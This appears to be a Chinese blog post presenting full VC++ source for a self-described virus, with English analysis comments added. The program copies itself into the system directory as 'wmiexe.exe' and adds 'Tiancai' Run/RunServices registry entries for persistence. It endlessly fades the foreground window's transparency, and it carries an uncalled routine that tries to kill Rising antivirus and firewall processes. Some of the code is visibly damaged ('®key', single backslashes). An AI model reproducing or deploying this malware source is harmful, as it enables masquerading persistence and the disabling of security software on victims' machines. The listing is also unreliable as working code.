  • VC++ 关闭防火墙,写入注册表

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 启动项(代码实际同时写入 HKEY_LOCAL_MACHINE 与 HKEY_CURRENT_USER 下的 Run 和 RunServices 共四个键,键值名为 Tiancai),实现开机自运行。病毒的表现是使用 SetLayeredWindowAttributes 函数,使当前前台窗口变为半透明,并在 50~255 的透明度之间反复淡入淡出。

    程序运行时先把自身复制到系统目录下的 wmiexe.exe(若该文件正被占用则结束旧进程后重试),启动该副本并退出;副本通过互斥量保证单实例,写入注册表启动项,再用 LoadLibrary 和 GetProcAddress 确定 SetLayeredWindowAttributes 函数位置,然后循环用 GetForegroundWindow 得到当前前台窗口句柄并修改其透明度。注意:代码里结束防火墙/杀毒软件进程的 KillProc(false) 分支在本文给出的代码中并未被调用,且 OpenProcess 以 0 权限打开目标进程,在 NT 系列 Windows 上 TerminateProcess 实际不会生效。

    透明.cpp程序如下

    #include "stdafx.h"

    #include <winuser.h>

    #include <windows.h>

    #include <shellapi.h>

    #include <tlhelp32.h>

    #pragma comment(lib, "User32.lib")

    // --- Globals (sample analysis notes) ---
    // level: alpha currently applied to the foreground window (255 = opaque); WinMain
    // cycles it between 50 and 255.
    unsigned char level;

    // buffer: declared but not referenced anywhere in the listing shown.
    char buffer[255];

    // syspath: system directory from GetSystemDirectory; WinMain later appends
    // "\wmiexe.exe" with strcat and no length check against the 100-byte buffer.
    char syspath[100];

    // exefile: full path of the running image (GetModuleFileName, silently truncated
    // at 100 bytes).
    char exefile[100];

    // err: last Win32 / registry status; assigned everywhere, inspected only once
    // (the CopyFile retry loop).
    int err;

    // regkey: reused for every Run/RunServices key opened in WinMain.
    HKEY regkey;

    // hMutex: single-instance mutex whose name is a run of spaces (see WinMain).
    HANDLE hMutex;

    // Signature of user32!SetLayeredWindowAttributes, resolved at runtime with
    // GetProcAddress -- presumably so the binary still loads on older Windows builds
    // whose user32 lacks the export (TODO confirm; nothing in the listing says why).
    typedef DWORD (WINAPI *PFUNC)(HWND,DWORD,BYTE,DWORD);

    // Loose, ASCII-only case-insensitive substring test: true when b occurs in a.
    // "Case folding" is done by also accepting c+32 and c-32, which for non-letters
    // equates unrelated characters too (e.g. '!' (33) and 'A' (65)), so this is weaker
    // than a real strcasecmp/strstr.
    // NOTE(review): the outer loop does not stop at the first match, so `r` only
    // reflects the LAST position where a[i] matched b[0]; a genuine earlier match is
    // reported as false if a later partial match fails, e.g.
    // instr("abcxabd","abc") -> false.
    // Callers: KillProc (process image names) and WinMain (is exefile under syspath?).
    bool instr(char* a,char* b)

    {

    // A needle longer than the haystack cannot occur; this also keeps the unsigned
    // subtraction below from wrapping.
    if (strlen(a)<strlen(b)){return false;}

    unsigned int i,j;

    bool r=false;

    // Candidate start positions 0 .. len(a)-len(b).
    for (i=0;i<strlen(a)-strlen(b)+1;i++)

    {

    // First character matches exactly or via the +/-32 fold.
    if ((a[i]==b[0])||(a[i]==b[0]+32)||(a[i]==b[0]-32))

    {

    // Optimistically mark a match, then clear it on the first mismatching character.
    // Note that r is overwritten again by every later candidate position.
    r=true;

    for (j=i;j-i<strlen(b);j++)

    {

    if ((a[j]!=b[j-i])&&(a[j]!=b[j-i]+32)&&(a[j]!=b[j-i]-32)){r=false;break;}

    }

    }

    }

    return r;

    }

    // Walk a Toolhelp process snapshot and call TerminateProcess on every entry whose
    // image name contains one of a fixed set of names (matched with the loose instr()).
    //   opt == true  : target "wmiexe.exe" -- the sample's own earlier copy in the
    //                  system directory, so CopyFile in WinMain can overwrite it
    //                  (WinMain calls this on error 32 = ERROR_SHARING_VIOLATION).
    //   opt == false : target RAVMON / RAVTIMER / RAVSERVICE / CCENTER (Rising antivirus
    //                  components) and PFWMAIN (looks like a personal-firewall main
    //                  process; vendor not established from this listing). In the
    //                  listing shown this branch is never reached: WinMain only ever
    //                  calls KillProc(true).
    // What the code actually achieves, from the visible calls:
    //   - OpenProcess is called with desiredAccess 0. On NT-family Windows the handle
    //     (if one is returned) lacks PROCESS_TERMINATE, so TerminateProcess fails.
    //     Neither OpenProcess nor TerminateProcess results are checked, and the
    //     per-process handle is never closed.
    //   - The snapshot handle is not checked against INVALID_HANDLE_VALUE, and the
    //     PROCESSENTRY32 allocated with new is never deleted (leaks once per call).
    void KillProc(bool opt)

    {

    HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

    PROCESSENTRY32* info=new PROCESSENTRY32;

        info->dwSize=sizeof(PROCESSENTRY32);

    if(Process32First(handle,info))

    {

    // Odd guard: after a *successful* Process32First this reads whatever the last
    // error code happened to be; if it is ERROR_NO_MORE_FILES the whole walk is skipped.
    if(GetLastError()!=ERROR_NO_MORE_FILES )

    {

    // First snapshot entry. The matching below is duplicated verbatim inside the
    // Process32Next loop instead of being shared.
    if (opt)

    {

    if (instr(info->szExeFile,"wmiexe.exe"))

    {

    // desiredAccess 0 -> no PROCESS_TERMINATE right; handle never closed.
    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    else

    {

    // Security-product process names (see header comment); only reached with opt == false.
    if (instr(info->szExeFile,"PFWMAIN.EXE")||

    instr(info->szExeFile,"RAVMON.EXE")||

    instr(info->szExeFile,"RAVTIMER.EXE")||

    instr(info->szExeFile,"RAVSERVICE.EXE")||

    instr(info->szExeFile,"CCENTER.EXE"))

    {

    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    // Remaining snapshot entries: same two branches as above.
    while(Process32Next(handle,info)!=FALSE)

    {

    if (opt)

    {

    if (instr(info->szExeFile,"wmiexe.exe"))

    {

    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    else

    {

    if (instr(info->szExeFile,"PFWMAIN.EXE")||

    instr(info->szExeFile,"RAVMON.EXE")||

    instr(info->szExeFile,"RAVTIMER.EXE")||

    instr(info->szExeFile,"RAVSERVICE.EXE")||

    instr(info->szExeFile,"CCENTER.EXE"))

    {

    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    }

    }

    }

    // Only the snapshot handle is released; `info` and every `h` above are leaked.
       CloseHandle(handle);

    }

    // Entry point. Two modes, selected by whether the running image already lives under
    // the system directory (instr(exefile, syspath)):
    //   1) not under it -> "installer": copy self to <system dir>\wmiexe.exe (a name that
    //      presumably imitates the legitimate Windows 9x WMI process of that name --
    //      TODO confirm), launch that copy with ShellExecute, exit.
    //   2) under it -> "resident": single-instance mutex, Run/RunServices persistence
    //      under both HKLM and HKCU (value name "Tiancai"), then loop forever fading the
    //      foreground window's alpha between 50 and 255 via SetLayeredWindowAttributes.
    // Indicators visible in this listing: file <system dir>\wmiexe.exe; registry value
    // "Tiancai" under SOFTWARE\Microsoft\Windows\CurrentVersion\Run and \RunServices in
    // HKLM and HKCU; a mutex whose name is a run of spaces.
    // hPrevInstance, lpCmdLine and nCmdShow are unused. The function never returns: the
    // goto loop at the end is unconditional, so `return 0` is unreachable.
    int APIENTRY WinMain(HINSTANCE hInstance,

                         HINSTANCE hPrevInstance,

                         LPSTR     lpCmdLine,

                         int       nCmdShow)

    {

      // TODO: Place code here.

    // Start fully opaque; d_level is the per-iteration alpha step whose sign is flipped
    // at both ends of the range.
    level=255;

    int d_level=5;

    HWND hwnd;

    long win_long;

    // Zero both path buffers (strset is MSVC-specific).
    strset(syspath,0);

    strset(exefile,0);

    HMODULE module = GetModuleHandle(0); 

    // Full path of the running image (silently truncated if longer than 100 bytes) and
    // the system directory. Neither return value is checked.
    GetModuleFileName(module, exefile, sizeof (exefile)); 

    GetSystemDirectory(syspath,100);

    // Mode 1: not yet running from the system directory -> install a copy there.
    if (!instr(exefile,syspath))

    {

    // As rendered here the literal has a single backslash ("\w" is not a valid C
    // escape); the original source presumably used "\\wmiexe.exe". No length check
    // against the 100-byte syspath buffer.
    strcat(syspath,"\wmiexe.exe");

    // Retry every 10 ms until the copy succeeds (bFailIfExists = FALSE, so an existing
    // file is overwritten). Error 32 = ERROR_SHARING_VIOLATION: an earlier copy is
    // still running, so try to terminate it first. Any other error just spins forever.
    while (CopyFile(exefile,syspath,false)==0)

    {

    err=GetLastError();

    if (err==32){KillProc(true);}

    Sleep(10);

    }

    // Launch the installed copy (which then takes mode 2 below) and exit.
    ShellExecute(NULL,"OPEN",syspath,NULL,NULL,1);

    Sleep(10);

    ExitProcess(0);

    }

    else

    {

    // Mode 2: single-instance guard. The mutex name is a run of spaces -- unusual enough
    // to serve as an indicator. The handle is never released (process lifetime anyway).
    hMutex = CreateMutex (NULL, TRUE, "          ");

    if (GetLastError () == ERROR_ALREADY_EXISTS){::ExitProcess(0);}

    // Persistence: value "Tiancai" = exefile under Run and RunServices, for HKLM and HKCU.
    // Notes on the listing as rendered:
    //   - "®key" is HTML-entity damage ("&reg" -> ®) for "&regkey"; likewise the single
    //     backslashes in the key paths would have to be "\\" in real C source.
    //   - Every RegOpenKey / RegSetValueEx / RegCloseKey result is stored in err and
    //     never checked. On NT-family Windows the RunServices keys normally do not exist
    //     and the HKLM writes need administrative rights, so those calls fail silently
    //     and RegSetValueEx is then invoked with whatever regkey already holds.
    //   - cbData is strlen(exefile), i.e. without the terminating NUL a REG_SZ expects.
    err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    }

    // Resolve SetLayeredWindowAttributes at runtime. Neither the module nor the
    // function pointer is NULL-checked, so on a user32 without that export the call in
    // the loop below goes through a null pointer.
    HMODULE m_hDLLUser32=LoadLibrary( "user32" );

    PFUNC SetLayeredWindowAttributes =(PFUNC)::GetProcAddress( m_hDLLUser32, "SetLayeredWindowAttributes" );

    // Main effect loop; the `goto start` at the bottom makes it infinite.
    start:

    //hwnd=FindWindow("Shell_TrayWnd",NULL);

    hwnd=GetForegroundWindow();

    // Skip "no window", the desktop window, the taskbar (Shell_TrayWnd) and Program
    // Manager (Progman); everything else in the foreground is affected.
    if ((hwnd!=0)&&

    (hwnd!=GetDesktopWindow())&&

    (hwnd!=FindWindow("Shell_TrayWnd",NULL))&&

    (hwnd!=FindWindow("Progman",NULL)))

    {

    // Add WS_EX_LAYERED (0x80000) to the window's extended style and apply `level` as
    // its alpha (flag 2 = LWA_ALPHA; the color-key argument is ignored in that mode).
    // The style bit is never removed, so a window that loses the foreground keeps
    // whatever alpha it had at that moment.
    win_long=GetWindowLong(hwnd,GWL_EXSTYLE);

    SetWindowLong(hwnd,GWL_EXSTYLE,win_long|0x80000);

    SetLayeredWindowAttributes(hwnd, NULL, level, 2);

    }

    // ~1 ms per step. Each time level reaches >= 254 (including the very first
    // iteration, since level starts at 255) the direction flips and the loop pauses one
    // second; at <= 50 it flips back. level is an unsigned char, so the step stays
    // within 50..255 with d_level = +/-5.
    Sleep(1);

    if (level>=254){d_level*=(-1);Sleep(1000);}

    if (level<=50){d_level*=(-1);}

    level+=d_level;

    goto start;

    return 0;

    }

  • 原文地址:https://www.cnblogs.com/hzcya1995/p/13318820.html